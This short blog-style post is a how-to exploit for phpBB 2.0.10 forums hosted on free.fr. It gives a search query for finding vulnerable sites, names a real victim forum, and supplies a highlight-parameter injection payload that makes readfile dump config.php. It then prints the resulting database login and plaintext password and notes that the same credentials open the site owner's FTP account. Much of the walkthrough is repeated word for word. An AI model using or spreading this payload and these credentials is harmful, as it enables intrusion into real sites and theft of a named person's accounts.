First of all, this sploit works on phpbb 2.0.10 hosted by free.fr, a french web provider. So, the Google Search : 2.0.10 © 2001, 2002 phpBB Group inurl:free.fr
Then, you have a victim example http://romain.matu.free.fr/phpBB2/
Now go to a topic and take the topic id.
Paste : viewtopic.php?a=config.php&t=TOPICID&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Results : http://romain.matu.free.fr/phpBB2/viewtopic.php?a=config.php&t=460&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Finally, look at the source of the page, and somewhere will appear :
<?php
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'sql.free.fr';
$dbname = 'romain.matu';
$dbuser = 'romain.matu';
$dbpasswd = 'nintendo';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
With Free.fr, the sql database login/pass are the same for the ftp account
FTP Adres: ftpperso.free.fr
Then, you have a victim example http://romain.matu.free.fr/phpBB2/
Now go to a topic and take the topic id.
Paste : viewtopic.php?a=config.php&t=TOPICID&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Results : http://romain.matu.free.fr/phpBB2/viewtopic.php?a=config.php&t=460&highlight=%2527.readfile($HTTP_GET_VARS[a]).%2527
Finally, look at the source of the page, and somewhere will appear :
<?php
// phpBB 2.x auto-generated config file
// Do not change anything in this file!
$dbms = 'mysql';
$dbhost = 'sql.free.fr';
$dbname = 'romain.matu';
$dbuser = 'romain.matu';
$dbpasswd = 'nintendo';
$table_prefix = 'phpbb_';
define('PHPBB_INSTALLED', true);
?>
With Free.fr, the sql database login/pass are the same for the ftp account
FTP Adres: ftpperso.free.fr
0 comments:
Post a Comment